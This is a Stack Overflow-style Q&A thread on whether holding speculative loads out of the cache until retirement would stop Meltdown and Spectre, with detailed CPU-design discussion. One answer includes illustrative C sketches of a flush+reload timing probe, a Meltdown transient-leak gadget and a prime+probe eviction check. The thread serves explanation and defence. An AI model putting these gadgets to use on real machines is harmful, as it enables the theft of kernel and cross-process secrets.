
If new CPUs had a cache buffer which was only committed to the actual CPU cache if the instructions are ever committed, would attacks similar to Meltdown still be possible?

The proposal is to let speculative execution load from memory, but not write to the CPU caches until the instructions are actually committed.

Peter Cordes
Bernardo Sulzbach

2 Answers


TL:DR: yes, I think it would solve Spectre (and Meltdown) in their current form (using a flush+reload cache-timing side channel to copy the secret data out of a physical register), but it would probably be too expensive (in power cost, and maybe also performance) to be a likely implementation.

But with hyperthreading (or more generally any SMT), there's also an ALU / port-pressure side-channel if you can get mis-speculation to run data-dependent ALU instructions with the secret data, instead of using it as an array index. The Meltdown paper discusses this possibility before focusing on the flush+reload cache-timing side-channel. (It's more viable for Meltdown than Spectre, because you have much better control of the timing of when the secret data is used.)

So modifying cache behaviour doesn't block the attacks entirely. It would take away the reliable side-channel for getting the secret data into the attacking process, though: ALU timing has higher noise and thus lower bandwidth for the same reliability (Shannon's noisy-channel coding theorem), and you have to make sure your code runs on the same physical core as the code under attack.
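
For concreteness, the flush+reload probe that the reliable channel is built on looks something like this. Untested sketch with x86 intrinsics; probe_buf and the cycle threshold are illustrative choices of mine, and a real attack would calibrate the threshold per machine:

    #include <stdint.h>
    #include <x86intrin.h>          /* _mm_clflush, _mm_mfence, __rdtscp */

    uint8_t probe_buf[256 * 4096];  /* one page per possible byte value */

    /* Flush every probe line, so that a later fast reload means
     * mis-speculated code touched that line. */
    static void flush_all(void) {
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe_buf[i * 4096]);
        _mm_mfence();
    }

    /* Time one reload: fast means the line was brought into cache. */
    static int was_cached(volatile uint8_t *p) {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;                   /* the timed access */
        uint64_t t1 = __rdtscp(&aux);
        return (t1 - t0) < 100;     /* threshold is machine-dependent */
    }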

On CPUs without SMT (e.g. Intel's desktop i5 chips), the ALU timing side-channel is very hard to use with Spectre, because you can't directly use perf counters on code you don't have privilege for. (But Meltdown could still be exploited by timing your own ALU instructions with Linux perf, for example).


Meltdown specifically is much easier to defend against, microarchitecturally, with simpler and cheaper changes to the hard-wired parts of the CPU that microcode updates can't rewire.

You don't need to block speculative loads from affecting cache; the change could be as simple as letting speculative execution continue after a TLB-hit load that will fault if it reaches retirement, but with the value used by speculative execution of later instructions forced to 0 because of the failed permission check against the TLB entry.

So the mis-speculated touch array[secret*4096] load (after the faulting load of the secret) would always make the same cache line hot, with no secret-data-dependent behaviour. The secret data itself would enter cache, but not a physical register. (And this stops ALU / port-pressure side-channels, too.)
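
In code, that mis-speculated sequence is roughly the following. Purely illustrative sketch (kaddr stands in for a kernel address; probe_buf is the flush+reload array sketched above); a real attack also suppresses the fault, e.g. with TSX or a signal handler:

    #include <stdint.h>

    extern uint8_t probe_buf[];   /* 256 * 4096 bytes, flushed beforehand */

    static void transient_leak(const uint8_t *kaddr) {
        uint8_t secret = *kaddr;  /* faults at retirement, but affected CPUs
                                     forward the data to dependent uops first */
        (void)*(volatile uint8_t *)&probe_buf[secret * 4096];
                                  /* mis-speculated load: leaves a
                                     secret-dependent line hot in cache */
    }

With the zero-forcing change, secret would be 0 during speculation, so the dependent load always touches probe_buf[0] and the timing probe has nothing to distinguish.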

Stopping the faulting load from even bringing the "secret" line into cache in the first place could make it harder to tell the difference between a kernel mapping and an unmapped page, which could possibly help protect against user-space trying to defeat KASLR by finding which virtual addresses the kernel has mapped. But that's not Meltdown.


Spectre

Spectre is the hard one because the mis-speculated instructions that make data-dependent modifications to microarchitectural state do have permission to read the secret data. Yes, a "load queue" that works similarly to the store queue could do the trick, but implementing it efficiently could be expensive. (Especially given the cache coherency problem that I didn't think of when I wrote this first section.)

(There are other ways of implementing your basic idea; maybe there's even a way that's viable. But extra bits on L1D lines to track their status have downsides and aren't obviously easier.)

The store queue tracks stores from execution until they commit to L1D cache. (Stores can't commit to L1D until after they retire, because that's the point at which they're known to be non-speculative, and thus can be made globally visible to other cores).

A load queue would have to store whole incoming cache lines, not just the bytes that were loaded. (But note that Skylake-X can do 64-byte ZMM stores, so its store-buffer entries do have to be the size of a cache line. But if they can borrow space from each other or something, then there might not be 64 * entries bytes of storage available, i.e. maybe only the full number of entries is usable with scalar or narrow-vector stores. I've never read anything about a limitation like this, so I don't think there is one, but it's plausible.)
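
To put rough numbers on the data-storage cost, here's how I'd model the two entry types in C. The field names and layout are my own illustrative assumptions, not real hardware:

    #include <stdint.h>

    /* Data storage only; real entries also carry ordering, retirement,
     * and store-forwarding metadata. */
    struct store_buffer_entry {       /* exists today */
        uint64_t addr;                /* store address */
        uint8_t  data[64];            /* up to a full line (SKX ZMM stores) */
        uint8_t  width;               /* bytes actually being stored */
    };

    struct load_queue_entry {         /* the proposed addition */
        uint64_t line_addr;           /* 64-byte-aligned line address */
        uint8_t  line[64];            /* the whole incoming cache line, not
                                         just the bytes the load asked for */
        uint8_t  coherency_state;     /* would also need MESI tracking and a
                                         snoop port; see the problem below */
    };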

A more serious problem is that Intel's current L1D design has 2 read ports + 1 write port. (And maybe another port for writing lines that arrive from L2 in parallel with committing a store? There was some discussion about that on Unexpectedly poor and weirdly bimodal performance for store loop on Intel Skylake.)

If your loaded data can't enter L1D until after the loads retire, then it's probably going to be competing for the same write port that stores use.

Loads that hit in L1D can still come directly from L1D, though, and loads that hit in the memory-order-buffer could still be executed at 2 per clock. (The MOB would now include this new load queue as well as the usual store queue + markers for loads to maintain x86 memory ordering semantics). You still need both L1D read ports to maintain performance for code that doesn't touch a lot of new memory, and mostly is reloading stuff that's been hot in L1D for a while.

This would make the MOB about twice as large (in terms of data storage), although it doesn't need any more entries. As I understand it, the MOB in current Intel CPUs is composed of the individual load-buffer and store-buffer entries. (Haswell has 72 and 42 respectively).


Hmm, a further complication is that the load data in the MOB has to maintain cache coherency with other cores. This is very different from store data, which is private and hasn't become globally visible / isn't part of the global memory order and cache coherency until it commits to L1D.

So this proposed "load queue" implementation mechanism for your idea is probably not feasible without tweaks: it would have to be checked by invalidation-requests from other cores, so that's another read-port needed in the MOB.

Any possible implementation would have the problem of needing to later commit to L1D like a store. I think it would be a significant burden for the cache not to be able to evict + allocate a new line when it arrives from off-core.

(Even allowing speculative eviction but not speculative replacement from conflicts leaves open a possible cache-timing attack. You'd prime all the lines in a set, then do a load that evicts a line from one set or another, and use a similar cache-timing side channel to find which line was evicted, instead of which one was fetched. So using extra bits in L1D to find / evict lines loaded during recovery from mis-speculation wouldn't eliminate this side-channel.)
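
That evict-based channel is basically prime+probe. A sketch of the probe side, where WAYS and STRIDE are assumptions about the cache geometry rather than known values:

    #include <stdint.h>
    #include <x86intrin.h>            /* __rdtscp */

    #define WAYS   8                  /* assumed associativity of the set */
    #define STRIDE (8 * 4096)         /* assumed spacing of same-set lines */

    /* Prime one set with WAYS lines, let the victim's speculative eviction
     * happen, then time each line: the slow reload is the evicted one. */
    static int find_evicted(volatile uint8_t *set_base) {
        for (int i = 0; i < WAYS; i++)        /* prime */
            (void)set_base[i * STRIDE];

        /* ... trigger the mis-speculated load here ... */

        for (int i = 0; i < WAYS; i++) {      /* probe */
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            (void)set_base[i * STRIDE];
            uint64_t t1 = __rdtscp(&aux);
            if (t1 - t0 > 100)                /* machine-dependent threshold */
                return i;
        }
        return -1;                            /* nothing evicted */
    }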


Footnote: all instructions are speculative. This question is worded well, but I think many people reading about OoO exec and thinking about Meltdown / Spectre fall into this trap of confusing speculative execution with mis-speculation.

Remember that all instructions are speculative when they're executed. It's not known to be correct speculation until retirement. Meltdown / Spectre depend on accessing secret data and using it during mis-speculation. But the basis of current OoO CPU designs is that you don't know whether you've speculated correctly or not; everything is speculative until retirement.

Any load or store could potentially fault, and so can some ALU instructions (e.g. floating point if exceptions are unmasked), so any performance cost that applies "only when executing speculatively" actually applies all the time. This is why stores can't commit from the store queue into L1D until after the store uops have retired from the out-of-order CPU core (with the store data in the store queue).
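
A trivial example of the ordering constraint (my own, nothing exotic):

    int done_flag;

    int consume(int *p) {
        int v = *p;      /* might fault: p could be a bad pointer */
        done_flag = 1;   /* executes early into the store queue, but can
                            only commit to L1D (become globally visible)
                            after it retires, i.e. after the load above
                            is known not to fault */
        return v;
    }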

However, I think conditional and indirect branches are treated specially, because they're expected to mis-speculate some of the time, and optimizing recovery for them is important. Modern CPUs do better with branches than just rolling back to the current retirement state when a mispredict is detected, I think using a checkpoint buffer of some sort. So out-of-order execution for instructions before the branch can continue during recovery.

But loop branches and other branches are very common, so most code executes "speculatively" in this sense too, with at least one branch-rollback checkpoint not yet verified as correct speculation. Most of the time it's correct speculation, so no rollback happens.

Recovery for mis-speculation of memory ordering or faulting loads is a full pipeline-nuke, rolling back to the retirement architectural state. So I think only branches consume the branch checkpoint microarchitectural resources.

Anyway, all of this is what makes Spectre so insidious: the CPU can't tell the difference between mis-speculation and correct speculation until after the fact. If it knew it was mis-speculating, it would initiate rollback instead of executing useless instructions / uops. Indirect branches are not rare, either (in user-space); every DLL or shared library function call uses one in normal executables on Windows and Linux.
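
For example, any call through a function pointer is an indirect branch, and so is the PLT stub that shared-library calls go through. Trivial illustration, not exploit code:

    #include <stdio.h>

    int main(void) {
        int (*fp)(const char *, ...) = printf; /* resolved via the GOT */
        fp("indirect call\n");   /* target comes from a register/memory, so
                                    the CPU predicts it with the BTB: the
                                    branch-target-injection (Spectre v2)
                                    entry point */
        return 0;
    }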

Peter Cordes
  • I'm not actually a HW designer, I just know a bit about electronics and have read stuff :P So this is pretty hand-wavey, but hopefully my mental model of what you can build in silicon is close enough for it to be useful hand-waving. – Peter Cordes Jan 11 '18 at 06:36
  • Would adding a Speculative attribute bit P in the cache lines work? The normal code would treat speculative lines as invalid (perform the read from memory anyway then toggle P) and the speculative code would access normal lines for reading but block for writing (or: use LFB if any available to temporarily hold the line before merging it at retirement). Speculative lines would have to be invisible to CC snoops and alter the S state so that no RFOs are made (and fall back to the write-to-normal-lines case above). Not sure it will work though, just my 2 cents off the top of my head :) – Margaret Bloom Jan 11 '18 at 11:21
  • 2
    @MargaretBloom: Note that most instructions are executed speculatively. It's not known until all previous instructions retire whether it was correct speculation. Most loads don't fault, FP exceptions are almost never unmasked, so normally the only mis-speculation is branch prediction and the occasional memory-ordering. But all instructions have to be treated as speculative until they retire. I should probably put this into an answer somewhere, because you're probably not the only person to be thinking things like "the normal code", but load uops are never non-speculative when executing. – Peter Cordes Jan 11 '18 at 18:01
  • @MargaretBloom: Using bits in cache might work, but I think only if you're willing to have speculative loads evict other lines. This stops a flush+read cache-timing attack, but slower side-channels might still be viable, as I mentioned in my answer. – Peter Cordes Jan 11 '18 at 18:05
  • Right, what a silly reasoning. Code *is* speculative until it is retired. But why the emphasis on the loads? "*but load uops are never non-speculative when executing*". Isn't this true for every instruction? Thanks for your time. – Margaret Bloom Jan 11 '18 at 20:37
  • 1
    @MargaretBloom: Yes, it's true for every instruction. I singled them out because speculative loads are the problem here, and speculative stores only go into the store queue. (Although note that the Meltdown paper points out that speculative execution of ALU instructions can tie up different execution units in a data-dependent way, so there's a timing side-channel with hyperthreading if you can get the secret data into a physical register for use by further instructions at all.) Hmm, I forgot about that; that means this might not even mitigate Meltdown. – Peter Cordes Jan 11 '18 at 20:42
  • Thank you Peter, I believe a general side-channel attack falls under the realm of Spectre, Meltdown is specific to the speculative load which must then use a cache covert channel (sorry I'm being talkative today :) ) – Margaret Bloom Jan 11 '18 at 20:53
  • 1
    @MargaretBloom: Thanks for your comments, they made me think of more interesting stuff to write (see updated answer). The key to Meltdown is that an under-privileged load gets kernel data into a register. Using it as a load index is just one side channel. (The Meltdown paper doesn't explain this well, but see https://security.stackexchange.com/questions/177100/why-are-amd-processors-not-less-vulnerable-to-meltdown-and-spectre/177101#177101). Either attack can use any side-channel. (Spectre with an ALU-timing side-channel is only barely plausible, but Meltdown can pin both threads). – Peter Cordes Jan 11 '18 at 21:46
  • Theoretically, Spectre could also be used against syscalls, so this should allow some window for an ALU-timing attack? Anyway, my point was more along the lines that Spectre demonstrates the general concept of extracting information through speculative execution and a side-channel, while Meltdown applies this to a specific flaw that doesn't require victim code to execute. – Margaret Bloom Jan 12 '18 at 09:06
  • 1
    @MargaretBloom: Oh yes, Spectre against the kernel directly is a thing, good point. Attacking the syscall dispatch branch would make the timing from `syscall` to execution of the target branch fairly predictable. Still, with all the overhead of training the branch predictor, and executing `syscall`, you can only keep the CPU core running the "gadget" sequence for a *much* smaller fraction of the total time than with Meltdown. (With Meltdown you could plausibly measure ALU port pressure averaged over multiple aborted TSX transactions). And it will detect the mispredict faster than with Melt – Peter Cordes Jan 12 '18 at 09:25

I suspect the overhead from buffering and committing the buffer would render the speculative execution / caching useless?

This is purely speculative (no pun intended) - I would love to see someone with a lower-level background weigh in on this!

Reece Como
  • I think it's plausible that you could design a load-buffer that works like the store-buffer, but the overhead would probably still be quite high (see my answer). If there are any other micro-architectural defenses, this idea is probably near the bottom of the list. – Peter Cordes Jan 11 '18 at 06:34
  • You provide a great overview of the factors involved, great answer! – Reece Como Jan 11 '18 at 08:39